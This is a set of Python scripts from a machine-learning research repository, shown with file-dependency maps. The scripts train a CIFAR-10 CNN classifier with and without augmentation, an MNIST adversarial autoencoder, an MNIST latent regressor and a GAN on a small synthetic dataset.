"/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", 
"/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,513 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/bigan/cifar10_cnn.py | '''Train a simple deep CNN on the CIFAR10 small images dataset.
It gets to 75% validation accuracy in 25 epochs, and 79% after 50 epochs.
(it's still underfitting at that point, though).
'''
from __future__ import print_function
import keras
from keras.datasets import cifar10
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras.callbacks import EarlyStopping, ModelCheckpoint
import matplotlib.pyplot as plt
import numpy as np
from sklearn.model_selection import train_test_split
# Set random seed for reproducibility
np.random.seed(12345)

# Define settings
num_classes = 10          # CIFAR-10 categories
num_examples = 5000       # training subset size taken from the full set
num_initializations = 5   # independent runs whose accuracies are averaged
# Function to plot training loss curves
def plot_train_loss(history):
    """Plot the training and validation loss curves from a Keras History."""
    curves = history.history
    for key in ('loss', 'val_loss'):
        plt.plot(curves[key])
    plt.title('Model Loss')
    plt.ylabel('Loss')
    plt.xlabel('Epoch')
    plt.legend(['Train', 'Validation'], loc='upper right')
    plt.show()
# The data, split between train and test sets:
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
# Restrict training data to the first num_examples images
x_train = x_train[:num_examples]
y_train = y_train[:num_examples]

# Split training data into training and validation set (90/10, fixed seed)
x_train, x_val, y_train, y_val = train_test_split(x_train, y_train, test_size=0.1, random_state=12345)

# Scale pixel values to [0, 1]
x_train = x_train.astype(np.float32) / 255.
x_val = x_val.astype(np.float32) / 255.
x_test = x_test.astype(np.float32) / 255.

# Convert class vectors to binary class matrices (one-hot encoding).
y_train = keras.utils.to_categorical(y_train, num_classes)
y_val = keras.utils.to_categorical(y_val, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
# Define model
def cnn_model():
    """Build the CIFAR-10 classifier: two conv/pool stages and a dense head.

    Uses the module-level `x_train` for the input shape and `num_classes`
    for the output width. Returns an uncompiled Sequential model.
    """
    layers = [
        Conv2D(32, (3, 3), padding='same', input_shape=x_train.shape[1:]),
        Activation('relu'),
        Conv2D(32, (3, 3)),
        Activation('relu'),
        MaxPooling2D(pool_size=(2, 2)),
        Dropout(0.25),
        Conv2D(64, (3, 3), padding='same'),
        Activation('relu'),
        Conv2D(64, (3, 3)),
        Activation('relu'),
        MaxPooling2D(pool_size=(2, 2)),
        Dropout(0.25),
        Flatten(),
        Dense(512),
        Activation('relu'),
        Dropout(0.5),
        Dense(num_classes),
        Activation('softmax'),
    ]
    model = Sequential()
    for layer in layers:
        model.add(layer)
    return model
# initiate RMSprop optimizer (legacy lowercase Keras API)
opt = keras.optimizers.rmsprop(lr=0.0001, decay=1e-6)
#opt = keras.optimizers.Adadelta()

# Set training hyper-parameters
epochs = 200
batch_size = 256
patience = 10   # early-stopping patience in epochs

# Per-initialization test accuracies, with and without augmentation
no_aug = np.zeros(num_initializations)
post_aug = np.zeros(num_initializations)
for initialization in range(num_initializations):
    # Instantiate a fresh CNN for this run
    model = cnn_model()

    # Train the model using RMSprop
    model.compile(loss='categorical_crossentropy',
                  optimizer=opt,
                  metrics=['accuracy'])

    # =====================================
    # No augmentation
    # =====================================
    print('Not using data augmentation.')

    # Specify callbacks: early stopping plus best-val_loss checkpointing
    callbacks = [EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0),
                 ModelCheckpoint('cifar10_cnn.h5', monitor='val_loss', verbose=1, save_best_only=True,
                                 mode='min')]

    no_aug_history = model.fit(x_train, y_train,
                               batch_size=batch_size,
                               epochs=epochs,
                               validation_data=(x_val, y_val),
                               callbacks = callbacks,
                               shuffle=True)

    # Restore the best (lowest val_loss) weights before evaluating
    model.load_weights('cifar10_cnn.h5')

    # Score trained model.
    scores = model.evaluate(x_test, y_test, verbose=1)
    no_aug[initialization] = scores[1]   # scores = [loss, accuracy]

    # =====================================
    # Post augmentation
    # =====================================
    # NOTE(review): this phase continues training the already-trained model
    # rather than starting from a fresh initialization -- confirm intended
    print('Using post augmentation.')

    # Specify callbacks
    callbacks = [EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0),
                 ModelCheckpoint('cifar10_post_augmented_cnn.h5', monitor='val_loss', verbose=1, save_best_only=True,
                                 mode='min')]

    # Specify augmentation details
    datagen = ImageDataGenerator(rotation_range=40,
                                 width_shift_range=0.2,
                                 height_shift_range=0.2,
                                 shear_range=0.2,
                                 zoom_range=0.2,
                                 horizontal_flip=True,
                                 fill_mode='nearest')

    # Fit the model on the batches generated by datagen.flow().
    post_aug_history = model.fit_generator(datagen.flow(x_train, y_train, batch_size=batch_size),
                                           epochs=epochs,
                                           steps_per_epoch=x_train.shape[0] // batch_size,
                                           validation_data=datagen.flow(x_val, y_val, batch_size=batch_size),
                                           validation_steps=x_val.shape[0] // batch_size,
                                           callbacks=callbacks)
    model.load_weights('cifar10_post_augmented_cnn.h5')

    # Score trained model
    scores = model.evaluate(x_test, y_test, verbose=1)
    post_aug[initialization] = scores[1]
# =====================================
# Show results
# =====================================

# Print mean test accuracy across the independent initializations
print('\n\nNo augmentation: %f\nPost augmentation: %f' % (np.mean(no_aug), np.mean(post_aug)))

# Plot loss curves (from the final initialization only)
plot_train_loss(no_aug_history)
plot_train_loss(post_aug_history) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": 
["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,514 | davidhayes3/ME-Project | refs/heads/master | /train_models/mnist_mlp/mnist_aae_train.py | from __future__ import print_function, division
from mnist_mlp_models import encoder_model, generator_model, aae_discriminator_model
from common_models.common_models import aae_model
from functions.visualization_funcs import save_reconstructions, plot_gan_batch_loss, plot_gan_epoch_loss, save_imgs,\
plot_discriminator_acc
from functions.data_funcs import get_mnist
from functions.auxiliary_funcs import save_models
from keras.optimizers import Adam
import numpy as np
# Set random seed for reproducibility
np.random.seed(12345)

# =====================================
# Define constants
# =====================================
img_rows = 28
img_cols = 28
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 100
num_classes = 10
image_path = 'Images/mnist_aae'   # prefix for saved figures
model_path = 'Models/mnist_aae'   # prefix for saved weights

# =====================================
# Load dataset
# =====================================

# Load MNIST data in range [0,1]; training labels are not needed here
(X_train, _), (X_test, y_test) = get_mnist()

# =====================================
# Instantiate and compile models
# =====================================

# Instantiate models
encoder = encoder_model()
generator = generator_model()
discriminator = aae_discriminator_model()

# Specify optimizer
lr = 0.0002
beta_1 = 0.5
optimizer = Adam(lr=lr, beta_1=beta_1)

# Compile discriminator: trained below to separate latent-prior samples
# from encoder outputs
discriminator.compile(loss='binary_crossentropy',
                      optimizer=optimizer,
                      metrics=['accuracy'])

# Compile the AAE with the discriminator frozen; the two losses are pixel
# reconstruction and the adversarial term, weighted so that reconstruction
# (scaled by the number of pixels) dominates
discriminator.trainable = False
aae = aae_model(encoder, generator, discriminator, img_shape)
aae.compile(loss=['binary_crossentropy', 'binary_crossentropy'],
            loss_weights=[np.prod(img_shape), 1],
            optimizer=optimizer)
# =====================================
# Train models
# =====================================

# Set training hyper-parameters
epochs = 100
batch_size = 128
epoch_save_interval = 5   # save sample images every this many epochs

# Compute number of batches in one epoch
num_batches = int(X_train.shape[0] / batch_size)

# Define arrays to hold progression of discriminator and AAE losses
d_batch_loss_trajectory = np.zeros(epochs * num_batches)
g_batch_loss_trajectory = np.zeros(epochs * num_batches)
d_epoch_loss_trajectory = np.zeros(epochs)
g_epoch_loss_trajectory = np.zeros(epochs)
d_acc_trajectory = np.zeros(epochs)

# Train for set number of epochs
for epoch in range(epochs):
    # Print current epoch number
    print("\nEpoch: " + str(epoch + 1) + "/" + str(epochs))

    # Reset per-epoch loss accumulators
    d_epoch_loss_sum = 0
    g_epoch_loss_sum = 0
    d_acc = 0

    # Shuffle training set
    # NOTE(review): randint draws indices with replacement, so this is a
    # resample rather than a true permutation -- confirm intended
    new_permutation = np.random.randint(0, X_train.shape[0], X_train.shape[0])
    X_train = X_train[new_permutation]

    # Train on all batches
    for batch in range(num_batches):
        imgs = X_train[batch * batch_size: (batch + 1) * batch_size]
        latent_fake = encoder.predict(imgs)                            # encoder outputs
        latent_real = np.random.normal(size=(batch_size, latent_dim))  # prior samples
        valid = np.ones((batch_size, 1))
        fake = np.zeros((batch_size, 1))

        # ---------------------
        # Train Discriminator
        # ---------------------

        d_loss_real = discriminator.train_on_batch(latent_real, valid)
        d_loss_fake = discriminator.train_on_batch(latent_fake, fake)
        d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)

        # Record discriminator batch loss details
        d_batch_loss_trajectory[epoch * num_batches + batch] = d_loss[0]
        d_epoch_loss_sum += d_loss[0]
        d_acc += d_loss[1]

        # ---------------------
        # Train Generator
        # ---------------------

        # Train the AAE: reconstruct imgs while the encoder drives its codes
        # toward being labelled 'valid' by the frozen discriminator
        g_loss = aae.train_on_batch(imgs, [imgs, valid])

        # Record generator loss
        g_batch_loss_trajectory[epoch * num_batches + batch] = g_loss[0]
        g_epoch_loss_sum += g_loss[0]

        # Print progress
        print("[Epoch: %d, Batch: %d / %d] [D loss: %f, acc: %.2f%%] [G loss: %f]" % (epoch + 1, batch, num_batches,
                                                                                      d_loss[0], 100 * d_loss[1],
                                                                                      g_loss[0]))

    # Get epoch loss data
    d_epoch_loss_trajectory[epoch] = d_epoch_loss_sum / num_batches
    g_epoch_loss_trajectory[epoch] = g_epoch_loss_sum / num_batches
    d_acc_trajectory[epoch] = 100 * (d_acc / num_batches)

    # If at save interval, save generated image samples
    if epoch % epoch_save_interval == 0:
        # Generate random sample of latent vectors and save generated images
        z = np.random.normal(size=(25, latent_dim))
        gen_imgs = generator.predict(z)
        save_imgs(image_path, gen_imgs, epoch, img_rows, img_cols, channels, color=False)

# Save encoder and generator weights
save_models(path=model_path, encoder=encoder, generator=generator)
# =====================================
# Visualizations
# =====================================

# Save reconstructions of test images
save_reconstructions(image_path, num_classes, X_test, y_test, generator, encoder, img_rows, img_cols, channels, color=False)

# Save loss curves at batch and epoch granularity
plot_gan_batch_loss(image_path, epochs, num_batches, d_batch_loss_trajectory, g_batch_loss_trajectory)
plot_gan_epoch_loss(image_path, epochs, d_epoch_loss_trajectory, g_epoch_loss_trajectory)
plot_discriminator_acc(image_path, epochs, d_acc_trajectory) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": 
["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,515 | davidhayes3/ME-Project | refs/heads/master | /train_models/mnist_mlp/mnist_lr_train.py | import numpy as np
from keras.callbacks import EarlyStopping, ModelCheckpoint
from functions.auxiliary_funcs import save_models
from functions.data_funcs import get_mnist
from functions.visualization_funcs import save_reconstructions, plot_train_loss
from mnist_mlp_models import encoder_model, generator_model
from common_models.common_models import latent_reconstructor_model
from keras.optimizers import Adam
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_rows = 28
img_cols = 28
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 100
num_classes = 10
image_path = 'Images/mnist_lr'
model_path = 'Models/mnist_lr'
# =====================================
# Load dataset
# =====================================
# Load MNIST data in range [-1,1]
(X_train, _), (X_test, y_test) = get_mnist(gan=True)
z_train = np.random.normal(size=(X_train.shape[0], latent_dim))
z_test = np.random.normal(size=(X_test.shape[0], latent_dim))
# =====================================
# Instantiate and compile models
# =====================================
# Instantiate models
encoder = encoder_model()
generator = generator_model(gan=True)
latent_regressor = latent_reconstructor_model(generator, encoder)
# Compile latent regressor
generator.load_weights('Models/mnist_gan_generator.h5')
generator.trainable = False
latent_regressor.compile(optimizer='SGD', loss='mse')
# =====================================
# Train models
# =====================================
# Set training hyper-parameters
epochs = 50
batch_size = 128
patience = 5
# Specify training stopping criterion
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
model_checkpoint = ModelCheckpoint(model_path + '.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
# Train model
history = latent_regressor.fit(z_train, z_train,
epochs=epochs,
batch_size=batch_size,
shuffle=True,
validation_data=(z_test, z_test),
callbacks=callbacks,
verbose=1)
# Rebuild the models and load the weights of the best saved latent regressor
decoder = generator_model()
encoder = encoder_model()
latent_reconstructor = latent_reconstructor_model(decoder, encoder)
latent_reconstructor.load_weights(model_path + '.h5')
# Save encoder weights
save_models(path=model_path, encoder=encoder)
# =====================================
# Visualization
# =====================================
# Save reconstructions of test images
save_reconstructions(image_path, num_classes, X_test, y_test, generator, encoder, img_rows, img_cols, channels, color=False)
# Plot training curves
plot_train_loss(image_path, history)
| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", 
"/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,516 | davidhayes3/ME-Project | refs/heads/master | /latent_space_visualization/synthetic_dataset/sd_gan_train.py | from __future__ import print_function, division
import numpy as np
from keras.optimizers import Adam
from sd_models import generator_model, gan_discriminator_model
from common_models.common_models import gan_model
from functions.auxiliary_funcs import save_models
from functions.visualization_funcs import plot_gan_epoch_loss, plot_gan_batch_loss, plot_discriminator_acc, save_imgs
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_dim = 4
img_rows = 2
img_cols = 2
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 2
num_classes = 16
image_path = 'Images/sd_gan'
model_path = 'Models/sd_gan'
# =====================================
# Load dataset
# =====================================
# Load dataset
X_train = np.loadtxt('Dataset/synthetic_dataset_x_train.txt', dtype=np.float32)
X_test = np.loadtxt('Dataset/synthetic_dataset_x_test.txt', dtype=np.float32)
y_train = np.loadtxt('Dataset/synthetic_dataset_y_train.txt', dtype=np.int)
y_test = np.loadtxt('Dataset/synthetic_dataset_y_test.txt', dtype=np.int)
# Reshape data to image format
X_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, channels)
X_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, channels)
# Normalize data to (-1,1)
X_train = (X_train - 0.5) / 0.5
X_test = (X_test - 0.5) / 0.5
# =====================================
# Instantiate models
# =====================================
# Instantiate models
discriminator = gan_discriminator_model()
generator = generator_model(gan=True)
# Specify optimizer for models
lr = 0.0002
beta_1 = 0.5
optimizer = Adam(lr=lr, beta_1=beta_1)
# Compile discriminator
discriminator.compile(loss=['binary_crossentropy'],
optimizer=optimizer,
metrics=['accuracy'])
# Compile GAN
discriminator.trainable = False
gan_generator = gan_model(generator, discriminator)
gan_generator.compile(loss=['binary_crossentropy'],
optimizer=optimizer)
# =====================================
# Train models
# =====================================
# Set training hyperparameters
epochs = 100
batch_size = 128
epoch_save_interval = 5
num_batches = int(X_train.shape[0] / batch_size)
# Define arrays to hold progression of discriminator and bigan losses
d_batch_loss_trajectory = np.zeros(epochs * num_batches)
g_batch_loss_trajectory = np.zeros(epochs * num_batches)
d_epoch_loss_trajectory = np.zeros(epochs)
g_epoch_loss_trajectory = np.zeros(epochs)
d_acc_trajectory = np.zeros(epochs)
# Train for set number of epochs
for epoch in range(epochs):
# Print current epoch number
print("\nEpoch: " + str(epoch + 1) + "/" + str(epochs))
# Set epoch losses to zero
d_epoch_loss_sum = 0
g_epoch_loss_sum = 0
d_acc = 0
# Shuffle training set
new_permutation = np.random.randint(0, X_train.shape[0], X_train.shape[0])
X_train = X_train[new_permutation]
# Train on all batches
for batch in range(num_batches):
# Create labels for discriminator inputs
valid = np.ones((batch_size, 1))
fake = np.zeros((batch_size, 1))
# ---------------------
# Train Discriminator
# ---------------------
# Select next batch of images from training set and encode
imgs = X_train[batch * batch_size: (batch + 1) * batch_size]
# Sample noise and generate img
z = np.random.normal(size=(batch_size, latent_dim))
imgs_ = generator.predict(z)
# Train the discriminator (img -> z is valid, z -> img is fake)
d_loss_real = discriminator.train_on_batch(imgs, valid)
d_loss_fake = discriminator.train_on_batch(imgs_, fake)
d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
# Record discriminator batch loss details
d_batch_loss_trajectory[epoch * num_batches + batch] = d_loss[0]
d_epoch_loss_sum += d_loss[0]
d_acc += d_loss[1]
# ----------------------------
# Train Generator
# ----------------------------
# Train the generator (generated images should be classified as valid by the discriminator)
g_loss = gan_generator.train_on_batch(z, valid)
# Record generator batch loss details
g_batch_loss_trajectory[epoch * num_batches + batch] = g_loss
g_epoch_loss_sum += g_loss
# Print progress
print("[Epoch: %d, Batch: %d / %d] [D loss: %f, acc: %.2f%%] [G loss: %f]" % (epoch+1, batch, num_batches,
d_loss[0], 100 * d_loss[1],
g_loss))
# Record epoch loss data
d_epoch_loss_trajectory[epoch] = d_epoch_loss_sum / num_batches
g_epoch_loss_trajectory[epoch] = g_epoch_loss_sum / num_batches
d_acc_trajectory[epoch] = 100 * (d_acc / num_batches)
# If at save interval, save generated image samples
if epoch % epoch_save_interval == 0:
z = np.random.normal(size=(25, latent_dim))
gen_imgs = generator.predict(z)
save_imgs(image_path, gen_imgs, epoch, img_rows, img_cols, channels, color=False)
# Save learned generator model to file
save_models(path=model_path, generator=generator)
# =====================================
# Visualization
# =====================================
# Save loss curves
plot_gan_batch_loss(image_path, epochs, num_batches, d_batch_loss_trajectory, g_batch_loss_trajectory)
plot_gan_epoch_loss(image_path, epochs, d_epoch_loss_trajectory, g_epoch_loss_trajectory)
